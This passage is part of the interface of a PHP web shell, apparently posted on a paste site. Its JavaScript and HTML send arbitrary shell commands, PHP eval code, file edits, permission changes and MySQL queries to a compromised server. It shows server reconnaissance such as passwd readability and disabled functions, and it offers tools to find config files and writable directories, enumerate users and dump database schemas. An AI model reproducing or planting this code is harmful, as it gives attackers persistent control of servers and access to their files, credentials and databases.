- req="query&q="+encodeURIComponent(document.getElementById('sql_in').value);
- sendRequest(req,'sqlQuery');
- } else {
- sendRequest(req);
- }
- }
- }
- function loadInput(input,params) {
- if(input=='rename') {
- document.getElementById('shell').innerHTML="Renaming file "+params+"<br /><input type='text' value='' id='rnfile'> <a href='#' onClick=\"sendRequest('rename&file="+params+"','rename')\">[ Rename ]</a>";
- }
- if(input=='chmod') {
- document.getElementById('shell').innerHTML="Changing perms for "+params+"<br /><input type='text' value='666' id='chfile'> <a href='#' onClick=\"sendRequest('chmod&file="+params+"','chmod')\">[ Chmod ]</a>";
- }
- if(input=='move') {
- document.getElementById('shell').innerHTML="Move file "+params+"<br /> to location: <input style='width: 500px' type='text' value='"+params+"' id='mvfile'> <a href='#' onClick=\"sendRequest('mv&file="+params+"','mvfile')\">[ Move ]</a>";
- }
- }
- function sendRequest(request,option) {
- url_req='';
- var xmlHTTP=1;
- if(window.XMLHttpRequest) xmlHTTP=new XMLHttpRequest();
- else if(window.ActiveXObject) xmlHTTP=new ActiveXObject('Microsoft.XMLHTTP');
- else alert('Get a new browser.');
- url_req='s='+request;
- if(option=='sqlsave') {
- var str='';
- var elem=document.getElementById('sqlvals').elements;
- for(var i=0;i<elem.length;i++) {
- if(i%2==0)
- str+="&"+encodeURIComponent(elem[i].value)+"=";
- else
- str+=encodeURIComponent(elem[i].value);
- }
- str+="&update=1";
- url_req+=str;
- }
- if(option=='save') {
- data=encodeURIComponent(document.getElementById('file').value)
- url_req+="&data="+data;
- }
- if(option=='rename') {
- url_req+="&rname="+document.getElementById('rnfile').value;
- }
- if(option=='chmod') {
- url_req+="&mod="+document.getElementById('chfile').value;
- }
- if(option=='mvfile') {
- url_req+="&location="+document.getElementById('mvfile').value;
- }
- if(option=='eval') {
- url_req+="&e="+encodeURIComponent(document.getElementById('eval').value);
- }
- if(option=='sqllogin') {
- url_req+="&host="+document.getElementById('sql_host').value+"&user="+document.getElementById('sql_user').value+"&pass="+encodeURIComponent(document.getElementById('sql_pass').value); //For passwords with pesky post characters.
- }
- if(option=='insert') {
- var str='';
- var elem=document.getElementById('vals').elements;
- for(var i=0;i<elem.length;i++) {
- if(i%2==0)
- str+="&"+escape(elem[i].value)+"=";
- else
- str+=escape(elem[i].value);
- }
- str+="&update=1";
- url_req+=str;
- }
- xmlHTTP.open('POST','?');
- xmlHTTP.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
- xmlHTTP.send(url_req);
- xmlHTTP.onreadystatechange=function() {
- if(xmlHTTP.readyState==4) {
- history_back(request);
- if(option=='cmd') {
- document.getElementById('cmd_in').value='Executing...';
- document.getElementById('cmd_out').innerHTML=xmlHTTP.responseText;
- document.getElementById('cmd_in').value='';
- }
- else if(option=='eval') {
- document.getElementById('eval_out').style.display='block';
- document.getElementById('eval_out').value=xmlHTTP.responseText;
- }
- else if(option=='sqlQuery') {
- document.getElementById('sql_out').style.display='block';
- document.getElementById('sql_in').value='Executing query...';
- document.getElementById('sql_out').value=xmlHTTP.responseText;
- document.getElementById('sql_in').value='';
- }
- else {
- document.getElementById('shell').innerHTML=xmlHTTP.responseText;
- }
- }
- }
- }
- </script>
- </head>
- <body>
- <?php
- echo "
- <div id='header'>
- Shell: <font color='#737a85'><b>$location</b></font><br />
- Server: <font color='#ff4422'>$remote_addr ($remote_host)</font><br />
- Local: <font color='#737a85'><b>$local_addr ($local_host)</b></font><br />
- Open_BaseDir: $open_basedir<br />
- Safe Mode: $safe_mode<br />
- MySQL: $mysql_on<br />
- Disabled functions: $disabled_functions<br />
- Shell status: <u><font color='#ff4422'>Viewing files</font></u><br />
- <div id='info' style='display: none;'>
- Disk: $disk_free of $disk_space<br />
- Software: $software<br />
- PHP Version: $php_ver<br />
- Uname: $uname<br />
- Read passwd: $read_passwd<br />
- cURL: $curl_on<br />
- Remote includes: $includes<br />
- </div>
- <a href='#' onClick=\"show('info')\">[ Show/Hide More Information ]</a>
- <br /><br />
- </div>
- <div id='browse'>
- <a href='#' onClick=\"sendRequest('view')\">[ Files ]</a>
- <a href='#' onClick=\"sendRequest('cmd')\">[ Console ]</a>
- <a href='#' onClick=\"sendRequest('eval')\">[ Eval ]</a>
- <a href='#' onClick=\"sendRequest('sql')\">[ MySQL ]</a>
- <a href='#' onClick=\"sendRequest('kill')\">[ Kill Shell ]</a>
- </div>
- <div id='back'></div>
- <br />
- <br />
- <div id='shell'>
- <script>sendRequest('view')</script>
- </div><br /><br />
- <table width='100%' style='font-size: 12px; text-align: center; margin: auto;' cols='2' cellpadding='5'>
- <tr><td colspan='2'>[ Execute CMD ]</td></tr>
- <tr><td colspan='2'><input type='text' value='whoami' style='width: 75%'></td></tr>
- <tr><td>[ Quick Commands ]</td><td>[ Tools ]</td></tr>
- <tr><td><select>
- <option name=''>Select a command</option>
- <option name='configs'>Current directory</option>
- <option name='sql'>Open ports</option>
- </select>
- </td>
- <td><select>
- <option name=''>Select a tool</option>
- <option name=''>---------------------------------------------------------------------</option>
- <option name='configs'>Find configs</option>
- <option name='sql'>Find SQL files</option>
- <option name='sql'>Find writable files</option>
- <option name='sql'>Find writable dirs</option>
- <option name='sql'>---------------------------------------------------------------------</option>
- <option name='sql'>Retrieve list of enumerated users</option>
- <option name='sql'>Dump tables and columns (schema)</option>
- </select>
- </td></tr>
- <tr><td>[ Upload file ]</td><td>[ Download file ]</td></tr>
- <tr><td>[ Enter directory ]</td><td>[ Edit file ]</td></tr>
- </table>
- </body>
- </html>";
- ob_end_flush();
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement